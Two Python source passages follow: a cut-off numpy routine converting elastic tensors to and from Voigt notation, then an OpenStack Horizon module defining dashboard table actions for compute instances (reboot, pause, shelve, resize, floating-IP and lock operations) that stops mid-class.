                    mat[ii, ii, 1, 0] = vec[ii, 2]/2**.5
                    mat[0, 1, ii, ii] = vec[2, ii]/2**.5
                    mat[1, 0, ii, ii] = vec[2, ii]/2**.5
                    for jj in range(dim):
                        mat[ii, ii, jj, jj] = vec[ii, jj]
                        mat[ii, ii, jj, jj] = vec[ii, jj]
        elif ndim == 1:  # vector -> matrix
            mat = np.diag(vec[:dim])
            if dim == 2:
                mat[0, 1] = vec[-1]/2**0.5
                mat[1, 0] = vec[-1]/2**0.5
            elif dim == 3:
                for ii in np.arange(sym-dim):
                    ind = list(range(sym-dim))
                    ind.remove(ii)
                    mat[ind[0], ind[1]] = vec[dim+ii]/2.**.5
                    mat[ind[1], ind[0]] = vec[dim+ii]/2.**.5
            else:
                raise ValueError("Incorrect dimension (%d)" % dim)
        return mat

    @staticmethod
    def create_voigt(mat, valtype='strain'):
        """
        It transfers a symmetric fourth-order tensor to a second-order tensor
        using Voigt's notation.

        Parameters
        ----------
        mat : numpy.array of shape = (3, 3, 3, 3)
            fourth-order tensor of elastic parameters
        valtype : one of 'strain' or 'stress'
            this distinguishes the engineering notation for strain and stress

        Returns
        -------
        vec : numpy.array of shape = (6, 6)
            second-order tensor of elastic parameters with Voigt's notation
        """
        dim = mat.shape[0]
        sym = int(dim*(dim+1)/2)
        if mat.ndim == 4:
            vec = np.zeros([sym, sym], dtype=mat.dtype)
            for ii in np.arange(dim):
                for jj in np.arange(dim):
                    kk = list(range(dim))
                    kk.remove(ii)
                    ll = list(range(dim))
                    ll.remove(jj)
                    vec[ii, jj] = mat[ii, ii, jj, jj]
                    vec[ii, jj+dim] = mat[ii, ii, ll[0], ll[1]]
                    vec[jj+dim, ii] = vec[ii, jj+dim]
                    vec[ii+dim, jj+dim] = mat[kk[0], kk[1], ll[0], ll[1]]
        elif mat.ndim == 2:
            vec = np.zeros(sym, dtype=mat.dtype)
            vec[:dim] = np.diag(mat)
            # engineering shear strain doubles the tensor component
            if valtype == 'strain':
                coef = 2.
            elif valtype == 'stress':
                coef = 1.
            else:
                msg = "Parameter valtype (%s) should be one of 'strain' or\
                    'stress'." % (str(valtype),)
                raise ValueError(msg)
            if dim == 2:
                vec[dim] = coef*mat[0, 1]
            elif dim == 3:
                for ii in np.arange(sym-dim):
                    ind = list(range(sym-dim))
                    ind.remove(ii)
                    vec[dim+ii] = coef*mat[ind[0], ind[1]]
            else:
                raise ValueError("Incorrect dimension (%d)" % dim)
        return vec
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.conf import settings
from django.core import urlresolvers
from django.http import HttpResponse # noqa
from django import shortcuts
from django import template
from django.template.defaultfilters import title # noqa
from django.utils.http import urlencode
from django.utils.translation import npgettext_lazy
from django.utils.translation import pgettext_lazy
from django.utils.translation import string_concat # noqa
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
import six
from horizon import conf
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.access_and_security.floating_ips \
import workflows
from openstack_dashboard.dashboards.project.instances import tabs
from openstack_dashboard.dashboards.project.instances.workflows \
import resize_instance
from openstack_dashboard.dashboards.project.instances.workflows \
import update_instance
from openstack_dashboard import policy
LOG = logging.getLogger(__name__)

# Instance states in which the corresponding operations are permitted.
ACTIVE_STATES = ("ACTIVE",)
VOLUME_ATTACH_READY_STATES = ("ACTIVE", "SHUTOFF")
SNAPSHOT_READY_STATES = ("ACTIVE", "SHUTOFF", "PAUSED", "SUSPENDED")

# Labels for nova power-state codes -- presumably the integer values of
# the "OS-EXT-STS:power_state" attribute; TODO confirm against consumers
# outside this chunk.
POWER_STATES = {
    0: "NO STATE",
    1: "RUNNING",
    2: "BLOCKED",
    3: "PAUSED",
    4: "SHUTDOWN",
    5: "SHUTOFF",
    6: "CRASHED",
    7: "SUSPENDED",
    8: "FAILED",
    9: "BUILDING",
}

# Indexes selecting the "do"/"undo" entry of the (present, past) label
# pairs returned by the Toggle* actions below.
PAUSE = 0
UNPAUSE = 1
SUSPEND = 0
RESUME = 1
SHELVE = 0
UNSHELVE = 1
def is_deleting(instance):
    """Return True when *instance* has an active "deleting" task state."""
    task_state = getattr(instance, "OS-EXT-STS:task_state", None)
    return bool(task_state) and task_state.lower() == "deleting"
class DeleteInstance(policy.PolicyTargetMixin, tables.DeleteAction):
    """Table action that schedules deletion of the selected instances."""

    policy_rules = (("compute", "compute:delete"),)
    help_text = _("Deleted instances are not recoverable.")

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Delete Instance", u"Delete Instances", count)

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Scheduled deletion of Instance",
            u"Scheduled deletion of Instances",
            count)

    def allowed(self, request, instance=None):
        """Permit deletion when the instance is in ERROR state or is not
        already being deleted."""
        if instance and instance.status == 'ERROR':
            return True
        return not is_deleting(instance)

    def action(self, request, obj_id):
        """Ask nova to delete the server identified by *obj_id*."""
        api.nova.server_delete(request, obj_id)
class RebootInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action performing a hard reboot of the selected instances."""

    name = "reboot"
    classes = ('btn-reboot',)
    policy_rules = (("compute", "compute:reboot"),)
    help_text = _("Restarted instances will lose any data"
                  " not saved in persistent storage.")
    action_type = "danger"

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Hard Reboot Instance", u"Hard Reboot Instances", count)

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Hard Rebooted Instance", u"Hard Rebooted Instances", count)

    def allowed(self, request, instance=None):
        """Permit reboot for ACTIVE/SHUTOFF instances not being deleted."""
        if instance is None:
            return True
        rebootable = (instance.status in ACTIVE_STATES
                      or instance.status == 'SHUTOFF')
        return rebootable and not is_deleting(instance)

    def action(self, request, obj_id):
        """Issue a hard (non-graceful) reboot via nova."""
        api.nova.server_reboot(request, obj_id, soft_reboot=False)
class SoftRebootInstance(RebootInstance):
    """Variant of RebootInstance that requests a graceful (soft) reboot."""

    name = "soft_reboot"

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Soft Reboot Instance", u"Soft Reboot Instances", count)

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Soft Rebooted Instance", u"Soft Rebooted Instances", count)

    def action(self, request, obj_id):
        """Issue a graceful reboot via nova."""
        api.nova.server_reboot(request, obj_id, soft_reboot=True)
class TogglePause(tables.BatchAction):
    """Batch action that pauses an active instance or unpauses a paused one.

    ``action_present``/``action_past`` return (pause, resume) label pairs;
    ``allowed`` picks the entry via ``current_present_action`` and
    ``action`` via ``current_past_action``.
    """

    name = "pause"
    icon = "pause"

    @staticmethod
    def action_present(count):
        # Pair indexed by current_present_action: PAUSE (0) / UNPAUSE (1).
        return (
            ungettext_lazy(
                u"Pause Instance",
                u"Pause Instances",
                count
            ),
            ungettext_lazy(
                u"Resume Instance",
                u"Resume Instances",
                count
            ),
        )

    @staticmethod
    def action_past(count):
        # Pair indexed by current_past_action: PAUSE (0) / UNPAUSE (1).
        return (
            ungettext_lazy(
                u"Paused Instance",
                u"Paused Instances",
                count
            ),
            ungettext_lazy(
                u"Resumed Instance",
                u"Resumed Instances",
                count
            ),
        )

    def allowed(self, request, instance=None):
        # The action is only meaningful when nova exposes the
        # AdminActions extension.
        if not api.nova.extension_supported('AdminActions',
                                            request):
            return False
        if not instance:
            return False
        # NOTE(review): direction stashed on self -- action() below reuses
        # this flag, so it relies on allowed() having run for the same row.
        self.paused = instance.status == "PAUSED"
        if self.paused:
            self.current_present_action = UNPAUSE
            policy_rules = (
                ("compute", "compute_extension:admin_actions:unpause"),)
        else:
            self.current_present_action = PAUSE
            policy_rules = (
                ("compute", "compute_extension:admin_actions:pause"),)
        # Policy check is scoped to the instance's project.
        has_permission = policy.check(
            policy_rules, request,
            target={'project_id': getattr(instance, 'tenant_id', None)})
        return (has_permission
                and (instance.status in ACTIVE_STATES or self.paused)
                and not is_deleting(instance))

    def action(self, request, obj_id):
        # Direction chosen from the state observed in allowed().
        if self.paused:
            api.nova.server_unpause(request, obj_id)
            self.current_past_action = UNPAUSE
        else:
            api.nova.server_pause(request, obj_id)
            self.current_past_action = PAUSE
class ToggleSuspend(tables.BatchAction):
    """Batch action that suspends an active instance or resumes a
    suspended one.

    Mirrors TogglePause: (suspend, resume) label pairs are selected via
    ``current_present_action`` / ``current_past_action``.
    """

    name = "suspend"
    classes = ("btn-suspend",)

    @staticmethod
    def action_present(count):
        # Pair indexed by current_present_action: SUSPEND (0) / RESUME (1).
        return (
            ungettext_lazy(
                u"Suspend Instance",
                u"Suspend Instances",
                count
            ),
            ungettext_lazy(
                u"Resume Instance",
                u"Resume Instances",
                count
            ),
        )

    @staticmethod
    def action_past(count):
        # Pair indexed by current_past_action: SUSPEND (0) / RESUME (1).
        return (
            ungettext_lazy(
                u"Suspended Instance",
                u"Suspended Instances",
                count
            ),
            ungettext_lazy(
                u"Resumed Instance",
                u"Resumed Instances",
                count
            ),
        )

    def allowed(self, request, instance=None):
        # The action is only meaningful when nova exposes the
        # AdminActions extension.
        if not api.nova.extension_supported('AdminActions',
                                            request):
            return False
        if not instance:
            return False
        # NOTE(review): direction stashed on self -- action() below reuses
        # this flag, so it relies on allowed() having run for the same row.
        self.suspended = instance.status == "SUSPENDED"
        if self.suspended:
            self.current_present_action = RESUME
            policy_rules = (
                ("compute", "compute_extension:admin_actions:resume"),)
        else:
            self.current_present_action = SUSPEND
            policy_rules = (
                ("compute", "compute_extension:admin_actions:suspend"),)
        # Policy check is scoped to the instance's project.
        has_permission = policy.check(
            policy_rules, request,
            target={'project_id': getattr(instance, 'tenant_id', None)})
        return (has_permission
                and (instance.status in ACTIVE_STATES or self.suspended)
                and not is_deleting(instance))

    def action(self, request, obj_id):
        # Direction chosen from the state observed in allowed().
        if self.suspended:
            api.nova.server_resume(request, obj_id)
            self.current_past_action = RESUME
        else:
            api.nova.server_suspend(request, obj_id)
            self.current_past_action = SUSPEND
class ToggleShelve(tables.BatchAction):
    """Batch action that shelves an instance or unshelves a
    shelved-offloaded one.
    NOTE: same stateful allowed()/action() pattern as TogglePause:
    allowed() records self.shelved and the present-action index that
    action() then consumes.
    """
    name = "shelve"
    icon = "shelve"
    @staticmethod
    def action_present(count):
        # (shelve, unshelve) label pair; current_present_action selects one.
        return (
            ungettext_lazy(
                u"Shelve Instance",
                u"Shelve Instances",
                count
            ),
            ungettext_lazy(
                u"Unshelve Instance",
                u"Unshelve Instances",
                count
            ),
        )
    @staticmethod
    def action_past(count):
        # Past-tense label pair; current_past_action selects one.
        return (
            ungettext_lazy(
                u"Shelved Instance",
                u"Shelved Instances",
                count
            ),
            ungettext_lazy(
                u"Unshelved Instance",
                u"Unshelved Instances",
                count
            ),
        )
    def allowed(self, request, instance=None):
        # Requires the nova Shelve extension.
        if not api.nova.extension_supported('Shelve', request):
            return False
        if not instance:
            return False
        # Only SHELVED_OFFLOADED counts as "shelved" here; SHELVE and
        # UNSHELVE are label-pair indexes defined earlier in this module.
        self.shelved = instance.status == "SHELVED_OFFLOADED"
        if self.shelved:
            self.current_present_action = UNSHELVE
            policy_rules = (("compute", "compute_extension:unshelve"),)
        else:
            self.current_present_action = SHELVE
            policy_rules = (("compute", "compute_extension:shelve"),)
        has_permission = policy.check(
            policy_rules, request,
            target={'project_id': getattr(instance, 'tenant_id', None)})
        return (has_permission
                and (instance.status in ACTIVE_STATES or self.shelved)
                and not is_deleting(instance))
    def action(self, request, obj_id):
        # Uses self.shelved captured by the preceding allowed() call.
        if self.shelved:
            api.nova.server_unshelve(request, obj_id)
            self.current_past_action = UNSHELVE
        else:
            api.nova.server_shelve(request, obj_id)
            self.current_past_action = SHELVE
class LaunchLink(tables.LinkAction):
    """Table-level action linking to the (legacy) launch-instance workflow.
    allowed() also doubles as the quota check: when the tenant is out of
    instance, core, or RAM quota the button is disabled (CSS class) and
    its label is annotated, but the action itself stays visible.
    """
    name = "launch"
    verbose_name = _("Launch Instance")
    url = "horizon:project:instances:launch"
    classes = ("ajax-modal", "btn-launch")
    icon = "cloud-upload"
    policy_rules = (("compute", "compute:create"),)
    ajax = True
    def __init__(self, attrs=None, **kwargs):
        # preempt=True lets this action handle its own AJAX requests
        # before normal table processing.
        kwargs['preempt'] = True
        super(LaunchLink, self).__init__(attrs, **kwargs)
    def allowed(self, request, datum):
        try:
            limits = api.nova.tenant_absolute_limits(request, reserved=True)
            instances_available = limits['maxTotalInstances'] \
                - limits['totalInstancesUsed']
            cores_available = limits['maxTotalCores'] \
                - limits['totalCoresUsed']
            ram_available = limits['maxTotalRAMSize'] - limits['totalRAMUsed']
            if instances_available <= 0 or cores_available <= 0 \
                    or ram_available <= 0:
                # Out of quota: visually disable the button and say why.
                if "disabled" not in self.classes:
                    self.classes = [c for c in self.classes] + ['disabled']
                    self.verbose_name = string_concat(self.verbose_name, ' ',
                                                      _("(Quota exceeded)"))
            else:
                # Quota available again: restore the normal label/classes.
                self.verbose_name = _("Launch Instance")
                classes = [c for c in self.classes if c != "disabled"]
                self.classes = classes
        except Exception:
            LOG.exception("Failed to retrieve quota information")
            # If we can't get the quota information, leave it to the
            # API to check when launching
        return True  # The action should always be displayed
    def single(self, table, request, object_id=None):
        # AJAX entry point: refresh the (possibly disabled) button state.
        self.allowed(request, None)
        return HttpResponse(self.render(is_table_action=True))
class LaunchLinkNG(LaunchLink):
    """Angular variant of LaunchLink: opens the Launch Instance wizard
    through an ng-click handler rather than a server-rendered modal.
    """
    name = "launch-ng"
    url = "horizon:project:instances:index"
    ajax = False
    classes = ("btn-launch", )
    def get_default_attrs(self):
        # Wire the anchor to the Angular wizard controller; on success
        # the wizard redirects back to the instances index.
        success_url = urlresolvers.reverse(self.url)
        self.attrs.update({
            'ng-controller': 'LaunchInstanceModalController as modal',
            'ng-click': ("modal.openLaunchInstanceWizard("
                         "{ successUrl: '%s' })" % success_url),
        })
        return super(LaunchLinkNG, self).get_default_attrs()
    def get_link_url(self, datum=None):
        # Navigation happens entirely via ng-click.
        return "javascript:void(0);"
class EditInstance(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the instance update workflow."""
    name = "edit"
    verbose_name = _("Edit Instance")
    url = "horizon:project:instances:update"
    classes = ("ajax-modal",)
    icon = "pencil"
    policy_rules = (("compute", "compute:update"),)
    def get_link_url(self, project):
        return self._get_link_url(project, 'instance_info')
    def _get_link_url(self, project, step_slug):
        # Deep-link into the requested workflow step and pass the current
        # table URL so the workflow can redirect back here afterwards.
        base_url = urlresolvers.reverse(self.url, args=[project.id])
        next_url = self.table.get_full_url()
        query = urlencode({
            "step": step_slug,
            update_instance.UpdateInstance.redirect_param_name: next_url,
        })
        return "?".join([base_url, query])
    def allowed(self, request, instance):
        return not is_deleting(instance)
class EditInstanceSecurityGroups(EditInstance):
    """EditInstance variant that jumps straight to the security-groups
    step of the update workflow.
    """
    name = "edit_secgroups"
    verbose_name = _("Edit Security Groups")
    def get_link_url(self, project):
        return self._get_link_url(project, 'update_security_groups')
    def allowed(self, request, instance=None):
        # Only active, non-deleting instances owned by the current
        # project may have their security groups edited.
        if instance.status not in ACTIVE_STATES:
            return False
        if is_deleting(instance):
            return False
        return request.user.tenant_id == instance.tenant_id
class CreateSnapshot(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the create-snapshot form for an instance."""
    name = "snapshot"
    verbose_name = _("Create Snapshot")
    url = "horizon:project:images:snapshots:create"
    classes = ("ajax-modal",)
    icon = "camera"
    policy_rules = (("compute", "compute:snapshot"),)
    def allowed(self, request, instance=None):
        # Snapshots are only offered for snapshot-ready, non-deleting
        # instances.
        if instance.status not in SNAPSHOT_READY_STATES:
            return False
        return not is_deleting(instance)
class ConsoleLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the console tab on the instance detail page."""
    name = "console"
    verbose_name = _("Console")
    url = "horizon:project:instances:detail"
    classes = ("btn-console",)
    policy_rules = (("compute", "compute_extension:consoles"),)
    def allowed(self, request, instance=None):
        # Consoles are enabled unless CONSOLE_TYPE is explicitly set to
        # None/False; an absent setting counts as enabled.
        console_enabled = bool(getattr(settings, 'CONSOLE_TYPE', True))
        return (console_enabled and
                instance.status in ACTIVE_STATES and
                not is_deleting(instance))
    def get_link_url(self, datum):
        base_url = super(ConsoleLink, self).get_link_url(datum)
        query = tabs.ConsoleTab(tabs.InstanceDetailTabs).get_query_string()
        return "?".join([base_url, query])
class LogLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the log tab on the instance detail page."""
    name = "log"
    verbose_name = _("View Log")
    url = "horizon:project:instances:detail"
    classes = ("btn-log",)
    policy_rules = (("compute", "compute_extension:console_output"),)
    def allowed(self, request, instance=None):
        if instance.status not in ACTIVE_STATES:
            return False
        return not is_deleting(instance)
    def get_link_url(self, datum):
        base_url = super(LogLink, self).get_link_url(datum)
        query = tabs.LogTab(tabs.InstanceDetailTabs).get_query_string()
        return "?".join([base_url, query])
class ResizeLink(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the resize/migrate workflow."""
    name = "resize"
    verbose_name = _("Resize Instance")
    url = "horizon:project:instances:resize"
    classes = ("ajax-modal", "btn-resize")
    policy_rules = (("compute", "compute:resize"),)
    def get_link_url(self, project):
        return self._get_link_url(project, 'flavor_choice')
    def _get_link_url(self, project, step_slug):
        # Deep-link into the requested workflow step and pass the current
        # table URL so the workflow can redirect back here afterwards.
        base_url = urlresolvers.reverse(self.url, args=[project.id])
        next_url = self.table.get_full_url()
        query = urlencode({
            "step": step_slug,
            resize_instance.ResizeInstance.redirect_param_name: next_url,
        })
        return "?".join([base_url, query])
    def allowed(self, request, instance):
        resizable = (instance.status in ACTIVE_STATES or
                     instance.status == 'SHUTOFF')
        return resizable and not is_deleting(instance)
class ConfirmResize(policy.PolicyTargetMixin, tables.Action):
    """Row action that confirms a pending resize/migration in nova."""
    name = "confirm"
    verbose_name = _("Confirm Resize/Migrate")
    classes = ("btn-confirm", "btn-action-required")
    policy_rules = (("compute", "compute:confirm_resize"),)
    def allowed(self, request, instance):
        # Only meaningful while nova is waiting for confirmation.
        return instance.status == 'VERIFY_RESIZE'
    def single(self, table, request, instance):
        api.nova.server_confirm_resize(request, instance)
class RevertResize(policy.PolicyTargetMixin, tables.Action):
    """Row action that reverts a pending resize/migration in nova."""
    name = "revert"
    verbose_name = _("Revert Resize/Migrate")
    classes = ("btn-revert", "btn-action-required")
    policy_rules = (("compute", "compute:revert_resize"),)
    def allowed(self, request, instance):
        # Only meaningful while nova is waiting for confirmation.
        return instance.status == 'VERIFY_RESIZE'
    def single(self, table, request, instance):
        api.nova.server_revert_resize(request, instance)
class RebuildInstance(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the rebuild-instance form."""
    name = "rebuild"
    verbose_name = _("Rebuild Instance")
    classes = ("btn-rebuild", "ajax-modal")
    url = "horizon:project:instances:rebuild"
    policy_rules = (("compute", "compute:rebuild"),)
    def allowed(self, request, instance):
        rebuildable = (instance.status in ACTIVE_STATES or
                       instance.status == 'SHUTOFF')
        return rebuildable and not is_deleting(instance)
    def get_link_url(self, datum):
        return urlresolvers.reverse(
            self.url, args=[self.table.get_object_id(datum)])
class DecryptInstancePassword(tables.LinkAction):
    """Row action linking to the admin-password retrieval dialog."""
    name = "decryptpassword"
    verbose_name = _("Retrieve Password")
    classes = ("btn-decrypt", "ajax-modal")
    url = "horizon:project:instances:decryptpassword"
    def allowed(self, request, instance):
        # Offered only when the deployment opts in, the instance is in a
        # usable state, and a keypair is available to decrypt with.
        if not getattr(settings,
                       'OPENSTACK_ENABLE_PASSWORD_RETRIEVE',
                       False):
            return False
        if (instance.status not in ACTIVE_STATES
                and instance.status != 'SHUTOFF'):
            return False
        if is_deleting(instance):
            return False
        return get_keyname(instance) is not None
    def get_link_url(self, datum):
        return urlresolvers.reverse(
            self.url, args=[self.table.get_object_id(datum),
                            get_keyname(datum)])
class AssociateIP(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the floating-IP association workflow."""
    name = "associate"
    verbose_name = _("Associate Floating IP")
    url = "horizon:project:access_and_security:floating_ips:associate"
    classes = ("ajax-modal",)
    icon = "link"
    policy_rules = (("compute", "network:associate_floating_ip"),)
    def allowed(self, request, instance):
        # Hidden when floating IPs are unsupported, when one-click
        # association is available instead, on errored instances, or
        # when a floating IP is already attached.
        if not api.network.floating_ip_supported(request):
            return False
        if api.network.floating_ip_simple_associate_supported(request):
            return False
        if instance.status == "ERROR":
            return False
        has_floating = any(
            address.get('OS-EXT-IPS:type') == "floating"
            for addresses in instance.addresses.values()
            for address in addresses)
        if has_floating:
            return False
        return not is_deleting(instance)
    def get_link_url(self, datum):
        base_url = urlresolvers.reverse(self.url)
        next_url = self.table.get_full_url()
        query = urlencode({
            "instance_id": self.table.get_object_id(datum),
            workflows.IPAssociationWorkflow.redirect_param_name: next_url,
        })
        return "?".join([base_url, query])
class SimpleAssociateIP(policy.PolicyTargetMixin, tables.Action):
    """One-click action that allocates and associates a floating IP with
    an instance (no workflow dialog).
    """
    name = "associate-simple"
    verbose_name = _("Associate Floating IP")
    icon = "link"
    policy_rules = (("compute", "network:associate_floating_ip"),)
    def allowed(self, request, instance):
        # Only shown when the simple (one-click) association mode is on.
        if not api.network.floating_ip_simple_associate_supported(request):
            return False
        if instance.status == "ERROR":
            return False
        return not is_deleting(instance)
    def single(self, table, request, instance_id):
        try:
            # target_id is port_id for Neutron and instance_id for Nova Network
            # (Neutron API wrapper returns a 'portid_fixedip' string)
            target_id = api.network.floating_ip_target_get_by_instance(
                request, instance_id).split('_')[0]
            # Allocate a fresh floating IP from the pool and attach it.
            fip = api.network.tenant_floating_ip_allocate(request)
            api.network.floating_ip_associate(request, fip.id, target_id)
            messages.success(request,
                             _("Successfully associated floating IP: %s")
                             % fip.ip)
        except Exception:
            # Best-effort: surface a generic error message to the user.
            exceptions.handle(request,
                              _("Unable to associate floating IP."))
        return shortcuts.redirect(request.get_full_path())
class SimpleDisassociateIP(policy.PolicyTargetMixin, tables.Action):
    """One-click action that disassociates one floating IP from an
    instance (no dialog).
    """
    name = "disassociate"
    verbose_name = _("Disassociate Floating IP")
    classes = ("btn-disassociate",)
    policy_rules = (("compute", "network:disassociate_floating_ip"),)
    action_type = "danger"
    def allowed(self, request, instance):
        if not api.network.floating_ip_supported(request):
            return False
        if not conf.HORIZON_CONFIG["simple_ip_management"]:
            return False
        # Shown only when the instance actually has a floating IP.
        for addresses in instance.addresses.values():
            for address in addresses:
                if address.get('OS-EXT-IPS:type') == "floating":
                    return not is_deleting(instance)
        return False
    def single(self, table, request, instance_id):
        try:
            # target_id is port_id for Neutron and instance_id for Nova Network
            # (Neutron API wrapper returns a 'portid_fixedip' string)
            targets = api.network.floating_ip_target_list_by_instance(
                request, instance_id)
            target_ids = [t.split('_')[0] for t in targets]
            # Floating IPs currently attached to any of this instance's
            # ports.
            fips = [fip for fip in api.network.tenant_floating_ip_list(request)
                    if fip.port_id in target_ids]
            # Removing multiple floating IPs at once doesn't work, so this pops
            # off the first one.
            if fips:
                fip = fips.pop()
                api.network.floating_ip_disassociate(request, fip.id)
                messages.success(request,
                                 _("Successfully disassociated "
                                   "floating IP: %s") % fip.ip)
            else:
                messages.info(request, _("No floating IPs to disassociate."))
        except Exception:
            exceptions.handle(request,
                              _("Unable to disassociate floating IP."))
        return shortcuts.redirect(request.get_full_path())
class UpdateMetadata(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action that opens the Angular metadata editor for an instance.
    The link itself is inert ("javascript:void(0);"); navigation happens
    through the ng-click handler injected in get_link_url().
    """
    name = "update_metadata"
    verbose_name = _("Update Metadata")
    ajax = False
    icon = "pencil"
    attrs = {"ng-controller": "MetadataModalHelperController as modal"}
    policy_rules = (("compute", "compute:update_instance_metadata"),)
    def __init__(self, attrs=None, **kwargs):
        # preempt=True lets this action handle its own requests before
        # normal table processing.
        kwargs['preempt'] = True
        super(UpdateMetadata, self).__init__(attrs, **kwargs)
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        # NOTE: mutates the shared attrs dict with the per-row ng-click;
        # the table renders rows sequentially so this works in practice.
        self.attrs['ng-click'] = (
            "modal.openMetadataModal('instance', '%s', true, 'metadata')"
            % instance_id)
        return "javascript:void(0);"
    def allowed(self, request, instance=None):
        return (instance and
                instance.status.lower() != 'error')
def instance_fault_to_friendly_message(instance):
    """Map an instance's raw fault to a user-friendly message.

    Known fault messages get a tailored explanation; any other fault is
    wrapped in a generic "try again later" message that embeds the raw
    fault text.
    """
    fault = getattr(instance, 'fault', {})
    message = fault.get('message', _("Unknown"))
    friendly_messages = {
        'NoValidHost': _("There is not enough capacity for this "
                         "flavor in the selected availability zone. "
                         "Try again later or select a different availability "
                         "zone.")
    }
    fallback = _("Please try again later [Error: %s].") % message
    return friendly_messages.get(message, fallback)
def get_instance_error(instance):
    """Return a user-facing error message for an errored instance.

    Returns None unless the instance status is (case-insensitively)
    'error'; otherwise combines a preamble naming the instance with a
    friendly rendering of its fault.
    """
    if instance.status.lower() != 'error':
        return None
    message = instance_fault_to_friendly_message(instance)
    # Fall back to the instance id when the name is empty/None.
    # (Previously '%' bound tighter than 'or', so the id fallback could
    # never take effect.)
    preamble = _('Failed to perform requested operation on instance "%s", the '
                 'instance has an error status') % (instance.name or
                                                    instance.id)
    message = string_concat(preamble, ': ', message)
    return message
class UpdateRow(tables.Row):
    """AJAX row updater: refreshes a single instance row in place."""
    ajax = True
    def get_data(self, request, instance_id):
        # Any failure here propagates; the table shows the row as errored.
        instance = api.nova.server_get(request, instance_id)
        try:
            # Attach the full flavor object for the "Size" column.
            instance.full_flavor = api.nova.flavor_get(request,
                                                       instance.flavor["id"])
        except Exception:
            # Flavor lookup is best-effort; the row renders without it.
            exceptions.handle(request,
                              _('Unable to retrieve flavor information '
                                'for instance "%s".') % instance_id,
                              ignore=True)
        try:
            # Populate floating/fixed address info for the "IP" column.
            api.network.servers_update_addresses(request, [instance])
        except Exception:
            exceptions.handle(request,
                              _('Unable to retrieve Network information '
                                'for instance "%s".') % instance_id,
                              ignore=True)
        # Surface a friendly fault message if the instance is errored.
        error = get_instance_error(instance)
        if error:
            messages.error(request, error)
        return instance
class StartInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action that starts stopped instances."""
    name = "start"
    classes = ('btn-confirm',)
    policy_rules = (("compute", "compute:start"),)
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Start Instance",
            u"Start Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Started Instance",
            u"Started Instances",
            count
        )
    def allowed(self, request, instance):
        # instance is None for the table-level button: keep it visible.
        return ((instance is None) or
                (instance.status in ("SHUTDOWN", "SHUTOFF", "CRASHED")))
    def action(self, request, obj_id):
        api.nova.server_start(request, obj_id)
class StopInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action that shuts off running (or suspended) instances."""
    name = "stop"
    policy_rules = (("compute", "compute:stop"),)
    help_text = _("The instance(s) will be shut off.")
    action_type = "danger"
    @staticmethod
    def action_present(count):
        return npgettext_lazy(
            "Action to perform (the instance is currently running)",
            u"Shut Off Instance",
            u"Shut Off Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return npgettext_lazy(
            "Past action (the instance is currently already Shut Off)",
            u"Shut Off Instance",
            u"Shut Off Instances",
            count
        )
    def allowed(self, request, instance):
        # instance is None for the table-level button: keep it visible.
        # Row-level: only power states that can actually be stopped.
        return ((instance is None)
                or ((get_power_state(instance) in ("RUNNING", "SUSPENDED"))
                    and not is_deleting(instance)))
    def action(self, request, obj_id):
        api.nova.server_stop(request, obj_id)
class LockInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action that locks instances (nova admin lock)."""
    name = "lock"
    policy_rules = (("compute", "compute_extension:admin_actions:lock"),)
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Lock Instance",
            u"Lock Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Locked Instance",
            u"Locked Instances",
            count
        )
    def allowed(self, request, instance):
        """Offer locking only for instances that are not already locked."""
        # An instance without a 'locked' attribute is treated as unlocked.
        if getattr(instance, 'locked', False):
            return False
        return bool(api.nova.extension_supported('AdminActions', request))
    def action(self, request, obj_id):
        api.nova.server_lock(request, obj_id)
class UnlockInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Batch action that unlocks instances (nova admin unlock)."""
    name = "unlock"
    policy_rules = (("compute", "compute_extension:admin_actions:unlock"),)
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Unlock Instance",
            u"Unlock Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Unlocked Instance",
            u"Unlocked Instances",
            count
        )
    def allowed(self, request, instance):
        """Offer unlocking only for locked instances."""
        # Unknown lock state defaults to locked so the action stays visible.
        if not getattr(instance, 'locked', True):
            return False
        return bool(api.nova.extension_supported('AdminActions', request))
    def action(self, request, obj_id):
        api.nova.server_unlock(request, obj_id)
class AttachVolume(tables.LinkAction):
    """Row action linking to the attach-volume form.

    Only available while the instance is ACTIVE and not being deleted.
    """
    name = "attach_volume"
    verbose_name = _("Attach Volume")
    url = "horizon:project:instances:attach_volume"
